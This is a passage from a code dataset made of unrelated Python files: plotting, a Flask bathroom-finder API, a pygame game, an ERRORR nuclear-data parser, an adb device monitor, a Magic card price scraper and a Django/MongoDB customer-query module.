-0.42 \n \n M_f = M_exp_f(alfa, beta, gama)\n for i in range(len(Lbin)): Mbin[i] = 10**M_f(log10(Lbin[i]))\n ax.plot(Mbin,Lbin, 'g-') \n \n \n alfa = 3.25 \n beta = 0.59\n gama = -0.6\n M_f = M_exp_f(alfa, beta, gama)\n for i in range(len(Lbin)): Mbin[i] = 10**M_f(log10(Lbin[i]))\n ax.plot(Mbin,Lbin, '--', color='black') \n \n \n #alfa = 4.0 \n #beta = 0.82 \n #gama = -0.42 \n #M_f = M_exp_f(alfa, beta, gama)\n #for i in range(len(Lbin)): Mbin[i] = 10**M_f(log10(Lbin[i]))\n #ax.plot(Mbin,Lbin, 'g--') \n \n \n\n ax.set_xlabel('M'+r'$_v$'+' ['+r'$M_\\odot$'+']', fontsize=16)\n ax.set_ylabel('K'+r'$_s$'+'-band Luminosity ['+r'$L_\\odot$'+']', fontsize=16)\n \n #plt.minorticks_on()\n plt.tick_params(which='major', length=7, width=1.5)\n plt.tick_params(which='minor', length=4, color='#000033', width=1.0) \n\n plt.yticks(fontsize=16)\n plt.xticks(fontsize=16)\n\n ##ax.annotate(r'$L^{-0.5}$', (3.E7, 141), rotation=0, color='black', size=18)\n #ax.annotate(r'$L^{0.15}$', (4.5E11, 35), rotation=0, color='black', size=18)\n \n #ax.annotate(r'$L^{-0.7}$', (2.E8, 800), rotation=0, color='blue', size=18)\n\n plt.xscale('log')\n plt.yscale('log')\n plt.xlim(1.E10,2.E15)\n plt.ylim(5.E7,1.E13)\n\n \n \n \n plt.show()\n","sub_path":"Lumin_va_Mass.py","file_name":"Lumin_va_Mass.py","file_ext":"py","file_size_in_byte":3220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"330118476","text":"# IMPORTS\r\n\r\nimport os\r\n\r\nfrom tinydb import TinyDB, Query\r\n\r\nfrom flask import Flask, g, render_template, jsonify, request\r\n\r\napp = Flask(__name__)\r\n\r\n# DATABASE\r\n\r\ndb = TinyDB('db.json')\r\n\r\nbathrooms = db.table('bathrooms')\r\n\r\n# API ROUTES\r\n\r\n@app.route('/api/v1/bathrooms')\r\ndef get_bathrooms():\r\n \r\n # parameters\r\n \r\n search_area_start_lat = request.args.get('search_area_start_lat')\r\n search_area_start_lng = request.args.get('search_area_start_lng')\r\n search_area_end_lat = request.args.get('search_area_end_lat')\r\n search_area_end_lng = request.args.get('search_area_end_lng')\r\n gendering = request.args.get('gendering')\r\n accessibility = request.args.get('accessibility')\r\n venue_type = request.args.get('venue_type')\r\n \r\n if (search_area_start_lat is not None and search_area_start_lng is not None and search_area_end_lat is not None and search_area_end_lng is not None):\r\n \r\n # fetch results from location\r\n \r\n Bathroom = Query()\r\n \r\n if (gendering is not None):\r\n results = bathrooms.search((Bathroom.geometry.lat < float(search_area_start_lat)) & (Bathroom.geometry.lat > float(search_area_end_lat)) & (Bathroom.geometry.lng < float(search_area_start_lng)) & (Bathroom.geometry.lng > float(search_area_end_lng)) & ((Bathroom.properties.accessibleType==\"unisex\") | (Bathroom.properties.type==\"unisex\") | (Bathroom.properties.bathroom_gendering==\"gender neutral\")))\r\n else:\r\n results = bathrooms.search((Bathroom.geometry.lat < float(search_area_start_lat)) & (Bathroom.geometry.lat > float(search_area_end_lat)) & (Bathroom.geometry.lng < float(search_area_start_lng)) & (Bathroom.geometry.lng > float(search_area_end_lng)))\r\n\r\n return jsonify(results)\r\n\r\n else:\r\n return \"ERROR: search_area_start_lat, search_area_start_lng, search_area_end_lat and search_area_end_lng are required\"\r\n\r\n@app.route('/api/v1/bathroom')\r\ndef get_bathroom():\r\n \r\n # parameters\r\n \r\n bathroom_id = request.args.get('bathroom_id')\r\n \r\n if (bathroom_id is not None):\r\n \r\n # fetch record\r\n\r\n results = bathrooms.get(eid=bathroom_id)\r\n\r\n return jsonify(results)\r\n \r\n else:\r\n return \"ERROR: bathroom_id is required\"\r\n\r\n# USER FACING ROUTES\r\n\r\n@app.route('/')\r\ndef main_page():\r\n \r\n \r\n return render_template('index.html')\r\n \r\n# RUN APP\r\n\r\nif __name__ == \"__main__\":\r\n app.run()","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"281362078","text":"from Colors import *\nimport random\nimport pygame\nimport time\nimport os\npygame.init()\n\nscreen_width = 1200\nscreen_height = 700\nfps = 50\nx = True\nrep = None\nscore = 0\nenemy_attr = []\nmusic = {}\n\nimages = (\n pygame.image.load(\"images/bgb.png\"),\n random.choice([pygame.image.load(\"images/ship.png\"), pygame.image.load(\"images/ship1.png\")]),\n pygame.image.load(\"images/bullet.png\"),\n pygame.image.load(\"images/none.png\"),\n random.choice([pygame.image.load(\"images/corona1.png\"),\n pygame.image.load(\"images/corona3.png\"), pygame.image.load(\"images/corona4.png\"),\n pygame.image.load(\"images/corona5.png\"), pygame.image.load(\"images/corona6.png\")]),\n pygame.image.load(\"images/start.png\"),\n pygame.image.load(\"images/start1.jpg\")\n)\n\nmusic['start'] = pygame.mixer.Sound(\"music/start.wav\")\nmusic['bg'] = pygame.mixer.Sound(\"music/bg.wav\")\nmusic['fire'] = pygame.mixer.Sound(\"music/fire.wav\")\nmusic['blast'] = pygame.mixer.Sound(\"music/blast.wav\")\n\nship = pygame.transform.scale(pygame.transform.rotate(images[1], 270), (65, 65))\nship_x = (screen_width / 9)\nship_y = (screen_height - ship.get_height()) / 2\n\nbullet_list = []\nfired = []\n\npos = []\n\ngameWindow = pygame.display.set_mode((screen_width, screen_height))\npygame.display.set_caption(\"GoCorona - by Om Londhe\")\nclock = pygame.time.Clock()\n\n\ndef enemy():\n enemy_x = random.randrange(10, screen_width - 21)\n enemy_y = random.randrange(65, (screen_height - 65))\n img = images[4]\n pos.append([img, enemy_x, enemy_y])\n return pos\n\n\ndef fire():\n bullet = pygame.transform.scale(pygame.transform.rotate(images[2], 45), (75, 75))\n bullet_x = ship_x\n bullet_y = ship_y + (ship.get_height() - ship.get_height() - 4.5)\n bullet_velocity = 25\n bullet_list.append([bullet, bullet_x, bullet_y, bullet_velocity])\n return bullet_list\n\n\ndef check_collision():\n global score\n for i in fired:\n for j in enemy_attr:\n if (abs(j[2] - i[2]) < 15) and (abs(j[2] - i[2]) > 0) and (abs(j[1] < i[1])) and \\\n (abs(j[1] - i[1]) > 0):\n score = score + 1\n music['blast'].play()\n enemy_attr.remove(j)\n fired.remove(i)\n\n\ndef show_text(text, color, x, y):\n txt = font.render(text, True, color)\n gameWindow.blit(txt, (x, y))\n\n\nif not os.path.exists(\"hs.txt\"):\n with open(\"hs.txt\", 'w') as hs:\n hs.write(\"0\")\n\nwith open(\"hs.txt\", 'r') as hs:\n h_score = hs.read()\n\n\nfont = pygame.font.SysFont(None, 51)\nexit_game = False\n\n\ndef start():\n music['start'].play()\n global exit_game\n while not exit_game:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n exit_game = True\n if event.type == pygame.KEYDOWN or (event.type == pygame.MOUSEBUTTONDOWN):\n mainloop()\n gameWindow.blit(pygame.transform.scale(images[0], (screen_width, screen_height)).convert_alpha(), (0, 0))\n gameWindow.blit(ship, (ship_x, ship_y))\n gameWindow.blit(images[5], (700, 0))\n gameWindow.blit(pygame.transform.scale(images[6], (250, 250)).convert_alpha(), (0, 0))\n start_font = pygame.font.SysFont(None, 75)\n start_text = start_font.render(\"Press Any Key to Stop Coronavirus !!!\", True,\n random.choice([white, black, brown, yellow, green, red, orange, purple]))\n gameWindow.blit(start_text, (150, 500))\n pygame.display.update()\n clock.tick(fps)\n\n pygame.quit()\n quit()\n\n\ndef mainloop():\n music['bg'].play()\n global ship_x, ship_y, fired, h_score, rep, enemy_attr, exit_game\n enemy_attr = enemy()\n difficulty = 5\n\n while not exit_game:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n exit_game = True\n if event.type == pygame.MOUSEBUTTONDOWN:\n if event.button == pygame.BUTTON_LEFT:\n fired = fire()\n music['fire'].play()\n\n key_hold = pygame.key.get_pressed()\n if key_hold[pygame.K_UP] or key_hold[pygame.K_w]:\n if not ship_y <= 60:\n ship_y = ship_y - 9\n if key_hold[pygame.K_DOWN] or key_hold[pygame.K_s]:\n if not ship_y >= screen_height - 80:\n ship_y = ship_y + 9\n if key_hold[pygame.K_a] or key_hold[pygame.K_LEFT]:\n if not ship_x <= 10:\n ship_x = ship_x - 9\n if key_hold[pygame.K_d] or key_hold[pygame.K_RIGHT]:\n if not ship_x >= (screen_width - ship.get_width() - 10):\n ship_x = ship_x + 9\n\n gameWindow.blit(pygame.transform.scale(images[0], (screen_width, screen_height)).convert_alpha(), (0, 0))\n for bullet in fired:\n bullet[1] = bullet[1] + bullet[3]\n gameWindow.blit(bullet[0], (bullet[1], bullet[2]))\n check_collision()\n if bullet[1] >= screen_width:\n fired.remove(bullet)\n gameWindow.blit(ship, (ship_x, ship_y))\n\n for enemy_details in enemy_attr:\n gameWindow.blit(pygame.transform.scale(enemy_details[0], (60, 60)), (enemy_details[1], enemy_details[2]))\n if enemy_details[1] < -65:\n enemy_attr.remove(enemy_details)\n\n timer = time.clock()\n if int(timer % difficulty) == 0 and (rep != int(timer)):\n enemy_attr = enemy()\n for enemy_details in enemy_attr:\n gameWindow.blit(pygame.transform.scale(enemy_details[0], (60, 60)), (enemy_details[1], enemy_details[2]))\n rep = int(timer)\n\n if int(timer % 75) == 0 and int(timer) != 0 and difficulty != 1:\n difficulty = random.randrange(1, 5)\n\n if int(h_score) <= score:\n h_score = score\n with open(\"hs.txt\", 'w') as hs:\n hs.write(str(h_score))\n\n show_text(f\"Score: {score}\", white, 5, 5)\n show_text(f\"High-Score {h_score}\", white, 900, 5)\n pygame.display.update()\n clock.tick(fps)\n\n pygame.quit()\n quit()\n\n\nstart()\n","sub_path":"GoCorona/prev.py","file_name":"prev.py","file_ext":"py","file_size_in_byte":6097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"64902710","text":"import datetime\n\nfrom models.transfer import Transfer\nfrom models.application import Application\n\nactive_transfers = 0.0\ntotal_transfers = 0.0\ntoday = datetime.date.today()\n\nfor transfer in Transfer.all():\n if transfer.start_date <= today:\n total_transfers += sum(transfer.monthly_transfers)\n \napp = Application.app()\napp.total_transfers = total_transfers\napp.put()","sub_path":"tasks/transfers.py","file_name":"transfers.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"261675191","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 11 15:08:25 2018\n\n@author: fiorito_l\n\"\"\"\nimport logging\nfrom functools import reduce\n\nimport pandas as pd\nimport numpy as np\n\nfrom .utils import BaseFile, Xs\nfrom ..settings import SandyError\n\n__author__ = \"Luca Fiorito\"\n__all__ = [\"Errorr\"]\n\nclass Errorr(BaseFile):\n\n Format = \"errorr\"\n\n def read_section(self, mat, mf, mt):\n \"\"\"\n Parse MAT/MF/MT section\n \"\"\"\n if mf == 1:\n from .mf1 import read_errorr as read\n elif mf == 3:\n from .mf3 import read_errorr as read\n elif mf == 33 or mf == 31 or mf == 35:\n from .mf33 import read_errorr as read\n else:\n raise SandyError(\"SANDY cannot parse section MAT{}/MF{}/MT{}\".format(mat,mf,mt))\n if (mat,mf,mt) not in self.index:\n raise SandyError(\"section MAT{}/MF{}/MT{} is not in tape\".format(mat,mf,mt))\n return read(self.loc[mat,mf,mt].TEXT)\n\n def get_xs(self, listmat=None, listmt=None, **kwargs):\n \"\"\"\n Extract xs from errorr file into Xs instance.\n \"\"\"\n condition = self.index.get_level_values(\"MF\") == 3\n tape = self[condition]\n if listmat is not None:\n conditions = [tape.index.get_level_values(\"MAT\") == x for x in listmat]\n condition = reduce(lambda x,y: np.logical_or(x, y), conditions)\n tape = tape[condition]\n if listmt is not None:\n conditions = [tape.index.get_level_values(\"MT\") == x for x in listmt]\n condition = reduce(lambda x,y: np.logical_or(x, y), conditions)\n tape = tape[condition]\n mat = self.index.get_level_values(\"MAT\")[0]\n eg = self.read_section(mat,1,451)[\"EG\"]\n ListXs = []\n for ix,text in tape.TEXT.iteritems():\n mat,mf,mt = ix\n X = self.read_section(*ix)\n xs = pd.Series(X[\"XS\"], index=eg[:-1], name=(X[\"MAT\"],X[\"MT\"])).rename_axis(\"E\").to_frame()\n ListXs.append(xs)\n if not ListXs:\n logging.warn(\"requested cross sections were not found\")\n return pd.DataFrame()\n # Use concat instead of merge because indexes are the same\n frame = pd.concat(ListXs, axis=1).reindex(eg, method=\"ffill\")\n return Xs(frame)\n\n def get_std(self):\n \"\"\"\n Extract xs and std from errorr file into dataframe:\n index = energy\n columns = (MAT, MT, DATA)\n \"\"\"\n xs = self.get_xs()\n cov = self.get_cov()\n stdvals = np.sqrt(np.diag(cov.values))\n xsvals = xs.values.T.flatten()\n frame = pd.DataFrame.from_dict({\"XS\" : xsvals, \"STD\" : stdvals})\n frame.columns.name = \"DATA\"\n frame.index = cov.index\n frame = frame.unstack(level=[\"MAT\",\"MT\"])\n frame.columns = frame.columns.reorder_levels([\"MAT\",\"MT\",\"DATA\"])\n return frame","sub_path":"sandy/formats/errorr.py","file_name":"errorr.py","file_ext":"py","file_size_in_byte":2889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"567256052","text":"import sys\nimport os\nimport time\nimport subprocess\nfrom PyQt5.QtCore import QObject, pyqtSignal, pyqtSlot\n\nclass WorkerCheckAdb(QObject):\n addDeviceConnect = pyqtSignal(str, str)\n removeDeviceConnect = pyqtSignal(str)\n\n def __init__(self):\n super().__init__()\n self.deviceConnect = []\n\n def setUpConnect(self,deviceCode):\n deviceName = subprocess.Popen(\"adb -s %s shell getprop ro.product.brand\" % deviceCode, shell=True,\n stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n deviceName = deviceName.stdout.read().strip()\n deviceName = str(deviceName.strip()).strip().split(\"'\")[1]\n # print(\"setUpConnect %s - %s\" % (deviceName, deviceCode))\n self.addDeviceConnect.emit(deviceName,deviceCode)\n\n\n def removeConnect(self,deviceCode):\n self.removeDeviceConnect.emit(deviceCode)\n\n\n def isNotConnect(self,device):\n isNotConnect = device[\"isConnect\"] == False\n if isNotConnect:\n self.removeConnect(device[\"code\"])\n return isNotConnect\n\n @pyqtSlot()\n def runCheck(self):\n while True:\n for device in self.deviceConnect:\n device[\"isConnect\"] = False\n\n result = os.popen(\"adb devices\").read()\n # print(result)\n result = result.split(\"\\n\")\n for item in result:\n if \"\\tdevice\" in item:\n deviceCode = item.split(\"\\tdevice\")[0]\n device = {\"code\": deviceCode, \"isConnect\": False}\n if device not in self.deviceConnect:\n self.deviceConnect.append({\"code\": deviceCode, \"isConnect\": True})\n self.setUpConnect(deviceCode)\n else:\n index = self.deviceConnect.index(device)\n device = self.deviceConnect[index]\n device[\"isConnect\"] = True\n\n self.deviceConnect[:] = [device for device in self.deviceConnect if not self.isNotConnect(device)]\n\n # print(self.deviceConnect)\n time.sleep(5)","sub_path":"tools/android/adbWorker.py","file_name":"adbWorker.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"455604409","text":"import re\nimport sys\nimport urllib\n\nNameString = ' '\nCostString = ' '\nTypeString = ' '\nColorString = ' '\nRarityString = ' '\nHighCostString = ''\nMedCostString = ' '\nLowCostString = ' '\nEndRowString = ' '\n\nclass DoneException(Exception):\n pass\n\ndef find(contents, string):\n if not contents[:len(string)] == string:\n raise DoneException()\n return contents[len(string):]\n\ndef extract(contents, string, next):\n contents = find(contents, string)\n if not contents:\n raise DoneException()\n pos = contents.find(next)\n val = contents[0:pos]\n return contents[len(val):], val\n\ndef skip(contents, string, next):\n contents, val = extract(contents, string, next)\n return contents\n\ndef main(argv):\n if len(argv) < 1:\n raise Exception('Usage: ')\n\n url = 'http://magic.tcgplayer.com/db/price_guide.asp?setname=' + argv[0]\n contents = urllib.urlopen(url).read()\n\n pos = contents.find(NameString)\n if pos == -1:\n raise Exception('Could not find price list')\n contents = contents[pos:]\n\n Costs = { 'R': [[], [], []],\n 'M': [[], [], []]\n }\n\n while contents:\n try:\n contents, name = extract(contents, NameString, CostString)\n contents = skip(contents, CostString, TypeString)\n contents = skip(contents, TypeString, ColorString)\n contents = skip(contents, ColorString, RarityString)\n contents, rarity = extract(contents, RarityString, HighCostString)\n contents, highcost = extract(contents, HighCostString, MedCostString)\n contents, medcost = extract(contents, MedCostString, LowCostString)\n contents, lowcost = extract(contents, LowCostString, EndRowString)\n contents = skip(contents, EndRowString, NameString)\n except DoneException as e:\n break\n\n if rarity != 'R' and rarity != 'M':\n continue\n\n highcost = float(highcost[1:].replace(',', ''))\n medcost = float(medcost[1:].replace(',', ''))\n lowcost = float(lowcost[1:].replace(',', ''))\n\n Costs[rarity][0].append(highcost)\n Costs[rarity][1].append(medcost)\n Costs[rarity][2].append(lowcost)\n\n def triple(rarity):\n high = sum(Costs[rarity][0]) / len(Costs[rarity][0])\n med = sum(Costs[rarity][1]) / len(Costs[rarity][1])\n cost = sum(Costs[rarity][2]) / len(Costs[rarity][2])\n return high, med, cost\n\n try:\n mythics = triple('M')\n except:\n mythics = None\n rares = triple('R')\n\n def apply(c):\n if not mythics:\n return rares[c]\n return ((7.0 / 8.0) * rares[c]) + ((1.0 / 8.0) * mythics[c])\n\n high = apply(0)\n med = apply(1)\n low = apply(2)\n print('High EV: ' + str(high))\n print('Med EV: ' + str(med))\n print('Low EV: ' + str(low))\n\nif __name__ == '__main__':\n main(sys.argv[1:])\n\n","sub_path":"booster_ev.py","file_name":"booster_ev.py","file_ext":"py","file_size_in_byte":3355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"33395735","text":"import json\nimport datetime\n#from datetime import datetime\nfrom django.http import HttpResponse\nimport cmdb.utils as ResultUtils\nimport cmdb.utils_pymongo as mongoUtiliy\nimport cmdb.utils_biz_model as CommonModelUtils\nimport operator\nimport random\nfrom functools import reduce\nfrom Ringball_django.settings import logger\n\n# pymongo初始化\ndb = mongoUtiliy.MongodbOperate()\nmongoDB = 'Ringball'\n\n\n# # 增加数据(增)\n# def insert(request): # 第一次请求页面的时候,返回一个页面,页面有两个填写框\n# error_msg = '用户注册成功'\n#\n# customer=LpMgntCustMst()\n# id = request.POST['id']\n# if id == None :\n# customer.id = ResultUtils.getUUID()\n# else:\n# customer.id = id\n# customer.src = request.POST['src']\n# customer.phase = request.POST['phase']\n# customer.sex = request.POST['sex']\n# customer.birth_date = request.POST['birth_date']\n# customer.address = request.POST['address']\n# customer.marriage = request.POST['marriage']\n# customer.child = request.POST['child']\n# customer.industry = request.POST['industry']\n# customer.yearly_income = request.POST['yearly_income']\n# customer.yearly_expense = request.POST['yearly_expense']\n# customer.house = request.POST['house']\n# customer.car = request.POST['car']\n# customer.health_check = request.POST['health_check']\n# customer.smoke = request.POST['smoke']\n# customer.alcohol = request.POST['alcohol']\n# customer.phone_no = request.POST['phone_no']\n# customer.phone_nm = request.POST['phone_nm']\n# customer.phone_company = request.POST['phone_company']\n# customer.phone_role = request.POST['phone_role']\n# customer.phone_email = request.POST['phone_email']\n# customer.phone_address = request.POST['phone_address']\n# customer.phone_group = request.POST['phone_group']\n# customer.wechat_no = request.POST['wechat_no']\n# customer.wechat_nm = request.POST['wechat_nm']\n# customer.wechat_memo = request.POST['wechat_memo']\n# customer.wechat_img = request.POST['wechat_img']\n# customer.wechat_country = request.POST['wechat_country']\n# customer.wechat_city = request.POST['wechat_city']\n# customer.wechat_signature = request.POST['wechat_signature']\n# customer.wechat_phone = request.POST['wechat_phone']\n# customer.wechat_linkedin = request.POST['wechat_linkedin']\n# customer.wechat_group = request.POST['wechat_group']\n# customer.wechat_samegroup = request.POST['wechat_samegroup']\n# customer.weibo_id = request.POST['weibo_id']\n# customer.create_date = datetime.datetime.now()\n# customer.update_date = datetime.datetime.now()\n# customer.status = '1'\n# customer.save()\n# # 新增或更新跑批表记录,为跑批准备\n# CommonModelUtils.saveOrUpdateLpDsSchedule(customer.id, '0')\n#\n# return HttpResponse(ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_SUCCESS, error_msg, []))\n\n#####-------------- JASON ADDED BEGIN 20190617 ---------------######\n# 客户基本信息取得\ndef queryByID(request):\n error_msg = ''\n\n if request.method == \"POST\":\n sales_id = request.POST.get('sales_id')\n cust_id = request.POST.get('cust_id')\n sort_name = request.POST.get('sort_name')\n is_reverse = request.POST.get('is_reverse')\n\n logger.info(sales_id)\n # page_size = 0\n # if request.POST.get('page_size'):\n # page_size = int(request.POST.get('page_size'))\n #\n # page_num = 0\n # if request.POST.get('page_num'):\n # page_num = int(request.POST.get('page_num'))\n # sort = None\n # if request.POST.get('sort'):\n # sort = {}\n # sp = request.POST.get('sort').split(\",\")\n # for r in sp:\n # s = r.split(\":\")\n # sort[s[0]]=int(s[1])\n\n # work_dt = request.POST.get('work_date')\n # if work_dt==None:\n # work_dt = datetime.now().strftime(\"%Y-%m-%d\")\n # logger.info(work_dt)\n temp_data = [\n {\n \"$match\": {\n \"status\": \"1\",\n \"sales_id\": sales_id\n }\n },\n {\n \"$project\": {\n \"_id\": 0,\n 'sales_id': 1,\n 'cust_id': 1,\n 'src': 1,\n 'phase': 1,\n 'sex': 1,\n 'birth_date': 1,\n 'zipcode': 1,\n 'address': 1,\n 'marriage': 1,\n 'child': 1,\n 'parent': 1,\n 'industry': 1,\n 'profession': 1,\n 'yearly_income': 1,\n 'yearly_expense': 1,\n 'house': 1,\n 'house_loan': 1,\n 'car': 1,\n 'car_loan': 1,\n 'health_check': 1,\n 'smoke': 1,\n 'alcohol': 1,\n 'sick': 1,\n 'credit': 1,\n 'ext_city': 1,\n 'ext_age': 1,\n 'ext_age_from': 1,\n 'ext_age_to': 1,\n 'ext_consumption': 1,\n 'ext_has_pupil': 1,\n 'ext_has_junior': 1,\n 'ext_like_stock': 1,\n 'ext_like_finance': 1,\n 'ext_like_bank': 1,\n 'ext_like_creditcard': 1,\n 'ext_like_businesstrip': 1,\n 'ext_like_travel': 1,\n 'ext_like_health': 1,\n 'ext_like_didi': 1,\n 'ext_like_map': 1,\n 'ext_like_child': 1,\n 'phone_no': 1,\n 'phone_nm': 1,\n 'phone_company': 1,\n 'phone_role': 1,\n 'phone_email': 1,\n 'phone_address': 1,\n 'phone_group': 1,\n 'wechat_no': 1,\n 'wechat_nm': 1,\n 'wechat_memo': 1,\n 'wechat_img': 1,\n 'wechat_country': 1,\n 'wechat_city': 1,\n 'wechat_signature': 1,\n 'wechat_phone': 1,\n 'wechat_linkedin': 1,\n 'wechat_group': 1,\n 'wechat_samegroup': 1,\n 'weibo_id': 1,\n 'linkedin_id': 1,\n \"last_touch_date\": {\n \"$substr\": [\"$last_touch_date\", 0, 10]\n },\n 'last_touch_type': 1,\n 'create_date': 1,\n 'update_date': 1,\n 'isused': 1,\n 'status': 1,\n 'star_flg': 1,\n 'used_ticket': 1,\n }\n }\n ]\n\n logger.info(\"query cust mst begin\" + datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))\n# logger.info(temp_data)\n if cust_id != None and len(cust_id.strip()) != 0:\n temp_data[0]['$match']['cust_id'] = cust_id\n logger.debug(temp_data)\n ret = db.aggregate(mongoDB, 'LP_MGNT_CUST_MST', temp_data, request.POST.get('page_size'),\n request.POST.get('page_num'), '')\n else:\n logger.debug(temp_data)\n ret = db.aggregate(mongoDB, 'LP_MGNT_CUST_MST', temp_data, request.POST.get('page_size'),\n request.POST.get('page_num'), '')\n\n logger.info(\"query cust mst end\" + datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))\n\n if ret['result'] == 1:\n return HttpResponse(\n ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_ERROR, ret['ret'], []))\n else:\n # 逐条获取该客户的score,不存在时则设置为随机数\n # 获取客户列表数据\n retcust = ret['ret']\n\n if len(retcust) > 0:\n # retval用于保存待返回的数组\n retval = []\n\n temp_data = [\n {\n \"$match\": {\n \"status\": \"1\",\n \"sales_id\": sales_id\n }\n },\n {\n \"$project\": {\n \"_id\": 0,\n 'cust_id': 1,\n 'score': 1,\n\n }\n }\n ]\n\n if cust_id != None and len(cust_id.strip()) != 0:\n temp_data[0]['$match']['cust_id'] = cust_id\n\n scroeRet = db.aggregate(mongoDB, 'LP_SCORE_RESULT_LABEL_LASTEST', temp_data)\n scroelist = {}\n for r in scroeRet['ret']:\n scroelist[r['cust_id']]=str(r['score'])\n\n for rc in retcust:\n if rc['cust_id'] in scroelist.keys():\n rc['score'] = str(scroelist[rc['cust_id']])\n else:\n # TODO: 还没有跑模型之前,设置一个临时分数\n# last_chr = rc['cust_id'][-1]\n# last_num = ord(last_chr)\n# last_num = last_num % 15\n# rc['score'] = str(10 + last_num)\n rc['score'] = \"--\"\n\n # 灵豹分是拼装,不能在aggrerate中排序。拼装后排序\n if sort_name != None and is_reverse != None:\n sorted_result = sorted(retcust,key=operator.itemgetter(sort_name),reverse=int(is_reverse))\n else:\n sorted_result = sorted(retcust, key=operator.itemgetter(\"score\"), reverse=True)\n\n return HttpResponse(\n ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_SUCCESS, error_msg, sorted_result))\n\n # logger.info(\"query lastest score begin\" + datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))\n #\n # try:\n # for rc in retcust:\n # logger.info(\"loop begin\" + datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))\n #\n # retscore = db.query(mongoDB, 'LP_SCORE_RESULT_LABEL_LASTEST', {'cust_id': rc['cust_id'], 'status': '1'})\n #\n # # 在retval中添加score\n # if retscore.count() > 0:\n # rc['score'] = retscore[0]['score']\n # else:\n # rc['score'] = 0\n #\n # retval.append(rc)\n #\n # logger.info(\"loop end\" + datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))\n #\n # logger.info(\"query lastest score end\" + datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))\n #\n # return HttpResponse(\n # ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_SUCCESS, error_msg, retval))\n #\n # except Exception as e:\n # return HttpResponse(ResultUtils.createErrorResult(e))\n else:\n return HttpResponse(\n ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_SUCCESS, \"数据不存在\", []))\n else:\n return HttpResponse(ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_ERROR, \"请联系管理员\", []))\n\n\n# 客户基本信息取得(增员小助理)\ndef queryByIDTeam(request):\n error_msg = ''\n\n if request.method == \"POST\":\n sales_id = request.POST.get('sales_id')\n cust_id = request.POST.get('cust_id')\n sort_name = request.POST.get('sort_name')\n is_reverse = request.POST.get('is_reverse')\n\n logger.info(sales_id)\n temp_data = [\n {\n \"$match\": {\n \"status\": \"1\",\n \"sales_id\": sales_id\n }\n },\n {\n \"$project\": {\n \"_id\": 0,\n 'sales_id': 1,\n 'src': 1,\n 'cust_id': 1,\n 'sex': 1,\n 'birth_date': 1,\n 'marriage': 1,\n 'child': 1,\n 'industry': 1,\n 'profession': 1,\n 'yearly_income': 1,\n 'yearly_expense': 1,\n 'house': 1,\n 'house_loan': 1,\n 'car': 1,\n 'car_loan': 1,\n 'ext_city': 1,\n 'ext_age': 1,\n 'ext_age_from': 1,\n 'ext_age_to': 1,\n 'ext_consumption': 1,\n 'ext_has_pupil': 1,\n 'ext_has_junior': 1,\n 'phone_no': 1,\n 'phone_nm': 1,\n 'wechat_no': 1,\n 'wechat_nm': 1,\n 'wechat_memo': 1,\n \"last_touch_date\": {\n \"$substr\": [\"$last_touch_date\", 0, 10]\n },\n 'status': 1,\n }\n }\n ]\n\n logger.info(\"query cust mst begin\" + datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))\n if cust_id != None and len(cust_id.strip()) != 0:\n temp_data[0]['$match']['cust_id'] = cust_id\n logger.debug(temp_data)\n ret = db.aggregate(mongoDB, 'LP_MGNT_CUST_MST', temp_data, request.POST.get('page_size'),\n request.POST.get('page_num'), '')\n else:\n logger.debug(temp_data)\n ret = db.aggregate(mongoDB, 'LP_MGNT_CUST_MST', temp_data, request.POST.get('page_size'),\n request.POST.get('page_num'), '')\n\n logger.info(\"query cust mst end\" + datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))\n\n if ret['result'] == 1:\n return HttpResponse(\n ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_ERROR, ret['ret'], []))\n else:\n # 逐条获取该客户的score,不存在时则设置为随机数\n # 获取客户列表数据\n retcust = ret['ret']\n\n if len(retcust) > 0:\n # retval用于保存待返回的数组\n retval = []\n\n temp_data = [\n {\n \"$match\": {\n \"status\": \"1\",\n \"sales_id\": sales_id,\n }\n },\n {\n \"$project\": {\n \"_id\": 0,\n 'cust_id': 1,\n 'evaluate_score': 1, #增员潜力评估(0:未评估;A:高;B:中;C:低;D:未知)\n 'fact_1': 1, #评估维度1(收入,A:2万以上,B:1万以上,C:5千以上,D:其他)\n 'fact_2': 1, #评估维度2(年龄,A:30-40岁,B:40-50岁,C:20-30岁,D:其他)\n 'fact_3': 1, #评估维度3(婚姻,A:已婚,B:未婚,C:离婚,D:其他)\n 'fact_4': 1, #评估维度4(职业,A:专业人士,B:营销类,C:私营业主,D:其他)\n 'fact_5': 1, #评估维度5(学历,A:大学,B:大专,C:高中,D:其他)\n 'fact_6': 1, #评估维度6(认识时间,A:3年以上,B:1年以上,C:半年不到,D:其他)\n 'fact_7': 